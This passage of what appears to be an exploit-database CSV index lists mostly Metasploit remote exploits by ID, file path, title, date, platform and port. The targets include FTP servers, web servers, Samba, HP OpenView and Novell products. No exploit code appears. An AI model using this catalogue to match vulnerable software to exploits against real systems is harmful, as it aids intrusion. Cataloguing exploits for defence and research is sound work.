(Metasploit)",2010-11-14,Metasploit,windows,remote, -16726,exploits/windows/remote/16726.rb,"FTPPad 1.2.0 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16727,exploits/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554 -16728,exploits/windows/remote/16728.rb,"Gekko Manager FTP Client - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16729,exploits/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote, -16730,exploits/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16731,exploits/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote, -16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote, -16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 -16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote, -16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote, -16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16738,exploits/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote, -16739,exploits/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 -16740,exploits/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21 -16741,exploits/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16742,exploits/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16743,exploits/win_x86/remote/16743.rb,"32bit FTP Client - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,win_x86,remote, -16744,exploits/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203 -16745,exploits/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202 -16746,exploits/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 -16747,exploits/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 -16748,exploits/windows/remote/16748.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16749,exploits/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote, -16750,exploits/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16751,exploits/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote, -16752,exploits/windows/remote/16752.rb,"Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 -16753,exploits/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 -16754,exploits/windows/remote/16754.rb,"MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16755,exploits/windows/remote/16755.rb,"Novell iManager - 'getMultiPartParameters' Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,windows,remote,8080 -16756,exploits/windows/remote/16756.rb,"Sambar Server 6 - Search Results Buffer Overflow (Metasploit)",2010-02-13,Metasploit,windows,remote,80 -16757,exploits/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,8300 -16758,exploits/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,9999 -16759,exploits/win_x86/remote/16759.rb,"SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote, -16760,exploits/windows/remote/16760.rb,"Private Wire Gateway - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,80 -16761,exploits/windows/remote/16761.rb,"BadBlue 2.5 - 'ext.dll' Remote Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,80 -16762,exploits/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 -16763,exploits/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 -16764,exploits/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote, -16765,exploits/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 -16766,exploits/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 -16767,exploits/windows/remote/16767.rb,"IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16768,exploits/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16769,exploits/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,8008 -16770,exploits/windows/remote/16770.rb,"Savant Web Server 3.1 - Remote Overflow (Metasploit)",2010-10-04,Metasploit,windows,remote, -16771,exploits/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,windows,remote,8080 -16772,exploits/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 -16773,exploits/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 -16774,exploits/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote, -16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote, -16776,exploits/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote, -16777,exploits/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80 -16778,exploits/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881 -16779,exploits/windows/remote/16779.rb,"Now SMS/Mms Gateway - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800 -16780,exploits/cgi/remote/16780.rb,"HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote, -16781,exploits/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote, -16782,exploits/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote, -16783,exploits/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote, -16784,exploits/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,multiple,remote,80 -16785,exploits/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 -16786,exploits/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144 -16787,exploits/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote, -16789,exploits/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080 -16791,exploits/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 -16792,exploits/windows/remote/16792.rb,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16793,exploits/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 -16794,exploits/windows/remote/16794.rb,"httpdx - 'tolog()' Format String (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,80 -16795,exploits/cgi/remote/16795.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote, -16796,exploits/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 -16797,exploits/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16798,exploits/windows/remote/16798.rb,"Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote, -16799,exploits/windows/remote/16799.rb,"httpdx - 'h_handlepeer()' Remote Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote, -16800,exploits/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 -16801,exploits/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250 -16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote, -16803,exploits/windows/remote/16803.rb,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,4000 -16804,exploits/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16805,exploits/windows/remote/16805.rb,"HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 -16806,exploits/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote, -16807,exploits/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,57772 -16808,exploits/windows/remote/16808.rb,"NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 -16809,exploits/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,8080 -16810,exploits/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,443 -16811,exploits/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8090 -16812,exploits/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient 'form2raw.cgi' Remote Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 -16813,exploits/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,689 -16814,exploits/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8300 -16815,exploits/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote, -16816,exploits/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - 'Username' Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,23 -16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2380 -16818,exploits/windows/remote/16818.rb,"YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 -16819,exploits/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 -16820,exploits/windows/remote/16820.rb,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)",2010-11-11,Metasploit,windows,remote,25 -16821,exploits/windows/remote/16821.rb,"Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,25 -16822,exploits/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25 -16823,exploits/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389 -16824,exploits/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389 -16825,exploits/win_x86/remote/16825.rb,"CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote, -16826,exploits/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Remote Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292 -16827,exploits/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16828,exploits/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16829,exploits/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16830,exploits/windows/remote/16830.rb,"Symantec Remote Management - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16831,exploits/windows/remote/16831.rb,"SafeNet SoftRemote - IKE Service Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,62514 -16832,exploits/netware/remote/16832.rb,"Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,netware,remote, -16833,exploits/netware/remote/16833.rb,"NetWare 6.5 - SunRPC Portmapper CALLIT Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,netware,remote,111 -16834,exploits/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote (Metasploit)",2010-07-03,Metasploit,linux,remote, -16835,exploits/linux/remote/16835.rb,"Madwifi - SIOCGIWSCAN Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote, -16836,exploits/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote, -16837,exploits/linux/remote/16837.rb,"hplip - 'hpssd.py' From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote, -16838,exploits/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote, -16839,exploits/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16840,exploits/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16841,exploits/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16842,exploits/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,linux,remote, -16843,exploits/linux/remote/16843.rb,"Borland Interbase - 'jrd8_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16844,exploits/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16845,exploits/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote, -16846,exploits/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote, -16847,exploits/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote, -16848,exploits/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote, -16849,exploits/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote, -16850,exploits/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote, -16851,exploits/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote, -16852,exploits/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote, -16853,exploits/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote, -16854,exploits/hardware/remote/16854.rb,"Linksys WRT54 Access Point - 'apply.cgi' Remote Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote, -16855,exploits/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote, -16859,exploits/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote, -16860,exploits/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote, -16861,exploits/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote, -16862,exploits/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Remote Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote, -16863,exploits/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote, -16864,exploits/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote, -16865,exploits/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,osx,remote, -16866,exploits/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote, -16867,exploits/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote, -16868,exploits/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Remote Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,hardware,remote, -16869,exploits/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow (Metasploit)",2010-09-20,Metasploit,hardware,remote, -16870,exploits/multiple/remote/16870.rb,"Apple Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,multiple,remote, -16871,exploits/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,osx,remote, -16872,exploits/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote, -16873,exploits/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote, -16874,exploits/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote, -16875,exploits/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote, -16876,exploits/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote, -16878,exploits/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote, -16880,exploits/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote, -16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote, -16888,exploits/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote, -16903,exploits/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote, -16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,linux,remote, -16915,exploits/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote, -16916,exploits/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote, -16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote, -16920,exploits/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote, -16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote, -16922,exploits/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote, -16924,exploits/linux/remote/16924.rb,"ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)",2010-10-09,Metasploit,linux,remote, -16925,exploits/linux/remote/16925.rb,"Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)",2010-12-16,Metasploit,linux,remote, -16926,exploits/windows/remote/16926.rb,"Mercantec SoftCart - CGI Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16927,exploits/hp-ux/remote/16927.rb,"HP-UX LPD - Command Execution (Metasploit)",2010-10-06,Metasploit,hp-ux,remote, -16928,exploits/linux/remote/16928.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote, -16930,exploits/aix/remote/16930.rb,"ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)",2010-11-11,Metasploit,aix,remote, -16936,exploits/windows/remote/16936.html,"KingView 6.5.3 SCADA - ActiveX",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote, -16956,exploits/windows/remote/16956.rb,"Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit)",2011-03-07,Metasploit,windows,remote, -16957,exploits/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit)",2011-03-08,Metasploit,windows,remote, -16964,exploits/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution (Metasploit)",2011-03-11,Metasploit,unix,remote,8812 -16970,exploits/windows/remote/16970.rb,"Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,windows,remote, -16972,exploits/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote, -16974,exploits/android/remote/16974.html,"Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free",2011-03-14,"MJ Keith",android,remote, -16984,exploits/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote, -16985,exploits/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote, -16990,exploits/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote, -16993,exploits/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution",2011-03-17,"Todor Donev",hardware,remote, -16998,exploits/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote, -17022,exploits/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote, -17024,exploits/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote, -17027,exploits/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification (Metasploit)",2011-03-23,Metasploit,windows,remote, -17028,exploits/windows/remote/17028.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote, -17029,exploits/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote, -17030,exploits/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote, -17031,exploits/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote, -17034,exploits/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote File System",2011-03-23,"Jeremy Brown",windows,remote, -17038,exploits/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Remote Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17039,exploits/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17040,exploits/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17041,exploits/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe main' Remote Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17042,exploits/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17043,exploits/windows/remote/17043.rb,"HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized 